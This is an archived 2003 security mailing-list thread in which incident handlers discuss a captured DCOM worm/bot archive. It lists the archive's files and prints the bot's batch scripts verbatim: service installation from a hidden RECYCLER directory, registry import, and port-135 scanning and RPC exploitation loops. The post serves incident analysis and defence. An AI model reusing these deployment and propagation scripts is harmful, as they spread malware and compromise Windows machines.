Typical warez site stuff. Looks like the warez kiddies are using the worms to create new file repositories. Did you run strings on any of the files? Paul Schmehl (paulsat_private) Adjunct Information Security Officer The University of Texas at Dallas AVIEN Founding Member http://www.utdallas.edu/~pauls/ > -----Original Message----- > From: Andrej [mailto:lajat_private] > Sent: Tuesday, August 19, 2003 4:22 AM > To: incidentsat_private > Subject: DCOM bot.rar > > > I was finally able to get bot.rar... > Here is the archive list: > Archive bot.rar > > Name Size Packed Ratio Date Time Attr > CRC Meth > Ver > > -------------------------------------------------------------- > -------------- > --- > winole.exe 572928 566724 98% 22-07-03 18:47 .....A > 6E1BA67C m3e > 2.9 > wmpx.exe 43383 35139 80% 07-08-03 02:01 .....A > 0A73E7CB m3e > 2.9 > wx11.bat 109 109 100% 06-08-03 18:29 .....A > BA641709 m0e > 2.9 > wx12.bat 194 166 85% 07-08-03 03:28 .....A > 66A7E567 m3e > 2.9 > wx12.exe 19618 10055 51% 06-08-03 20:55 .....A > 273D03A0 m3e > 2.9 > logs 0 0 0% 07-08-03 14:22 .D.... > 00000000 m0 > 2.0 > unrar.bat 169 137 81% 06-08-03 18:22 .....A > 4E276E39 m3e > 2.9 > UnRAR.exe 194048 87237 44% 16-06-03 18:32 ...... > B638F78C m3e > 2.9 > bnc.cfg 76 75 98% 27-07-03 16:48 .....A > 03CDF0A3 m3e > 2.9 > Clear.exe 28672 11962 41% 16-06-03 18:32 .....A > FBA086F4 m3e > 2.9 > click.exe 32768 6149 18% 16-06-03 18:32 .....A > EA3874C5 m3e > 2.9 > CRC.EXE 24096 8231 34% 16-06-03 21:41 .....A > D2158CA5 m3e > 2.9 > cygwin1.dll 971080 375803 38% 17-06-03 03:06 .....A > 7337F48A m3e > 2.9 > deploy.bat 274 185 67% 06-08-03 18:20 .....A > A3DA5EC6 m3e > 2.9 > dhcpp.exe 69632 28908 41% 16-06-03 18:32 .....A > 2CA5E915 m3e > 2.9 > drvx.dll 2853 1215 42% 06-08-03 21:03 .....A > 5956B0F0 m3e > 2.9 > events.exe 134656 37316 27% 22-07-03 17:58 .....A > 0EF30C5D m3e > 2.9 > jesus.dll 4254 1275 29% 07-08-03 01:21 .....A > BFF39F13 m3e > 2.9 > LucomServer.dll 802 484 60% 06-08-03 18:00 > .....A 4C649F72 > m3e 2.9 > msoft.dll 206 128 62% 24-07-03 00:13 .....A > 8DF17003 m3e > 2.9 > nctl.exe 569344 542111 95% 26-07-03 21:12 .....A > F0C7F7AA m3e > 2.9 > pslist.exe 49152 21746 44% 16-06-03 21:41 .....A > ED211211 m3e > 2.9 > Q019204.EXE 21584 10136 46% 16-06-03 21:41 .....A > 212BBC50 m3e > 2.9 > reg.reg 773 432 55% 04-08-03 14:23 .....A > 6FE50066 m3e > 2.9 > service.exe 63488 26461 41% 01-07-03 10:40 .....A > 78DBBEF8 m3e > 2.9 > service.txt 176 129 73% 06-08-03 18:02 .....A > E63DBB36 m3e > 2.9 > SFind.exe 266752 263546 98% 07-08-03 02:04 .....A > 76BB24D4 m3e > 2.9 > start.dll 6153 1745 28% 07-08-03 14:22 .....A > 303AF0E8 m3e > 2.9 > users.dll 75017 23205 30% 07-08-03 01:22 .....A > EE2F60B1 m3e > 2.9 > > -------------------------------------------------------------- > -------------- > --- > 29 3152257 2060809 65% > > > the .bat files are below: > :::::::::::::: > deploy.bat > :::::::::::::: > cd C:\RECYCLER\S-1-5-21-57989841-1715567821-725345543-1004 > mkdir "logs" > copy bot.rar > c:\RECYCLER\S-1-5-21-57989841-1715567821-725345543-1004\LOGS\ > net stop WinOLE > service.exe -r WinOLE > service.exe service.txt > %SYSTEMROOT%\regedit.exe -S reg.reg > net start WinOLE > exit > :::::::::::::: > unrar.bat > :::::::::::::: > cd C:\RECYCLER\S-1-5-21-57989841-1715567821-725345543-1004\ > > attrib -r bot.rar > attrib -r unrar.exe > attrib -r unrar.bat > > unrar.exe x bot.rar > start deploy.bat > EXIT > :::::::::::::: > wx11.bat > :::::::::::::: > cd C:\RECYCLER\S-1-5-21-57989841-1715567821-725345543-1004\ > ECHO. > RPC.dll > sfind -p 135 %1 %2 > del RPC.dll > :::::::::::::: > wx12.bat > :::::::::::::: > cd C:\RECYCLER\S-1-5-21-57989841-1715567821-725345543-1004\ > ECHO. > rpcf.dll > ping -n 1 %2 | find "Reply" > if errorlevel 1 goto end > wx12.exe 1 %2 %1 > wx12.exe 0 %2 %1 > :end > del rpcf.dll > exit > > > -------------------------------------------------------------- > ------------- > Captus Networks - Integrated Intrusion Prevention and Traffic > Shaping > - Instantly Stop DoS/DDoS Attacks, Worms & Port Scans > - Automatically Control P2P, IM and Spam Traffic > - Ensure Reliable Performance of Mission Critical Applications > - Precisely Define and Implement Network Security and > Performance Policies **FREE Vulnerability Assessment Toolkit > - WhitePapers - Live Demo Visit us at: > http://www.securityfocus.com/sponsor/CaptusNetworks_incidents_030814 > -------------------------------------------------------------- > -------------- > > --------------------------------------------------------------------------- Captus Networks - Integrated Intrusion Prevention and Traffic Shaping - Instantly Stop DoS/DDoS Attacks, Worms & Port Scans - Automatically Control P2P, IM and Spam Traffic - Ensure Reliable Performance of Mission Critical Applications - Precisely Define and Implement Network Security and Performance Policies **FREE Vulnerability Assessment Toolkit - WhitePapers - Live Demo Visit us at: http://www.securityfocus.com/sponsor/CaptusNetworks_incidents_030814 ----------------------------------------------------------------------------
This archive was generated by hypermail 2b30 : Tue Aug 19 2003 - 21:05:08 PDT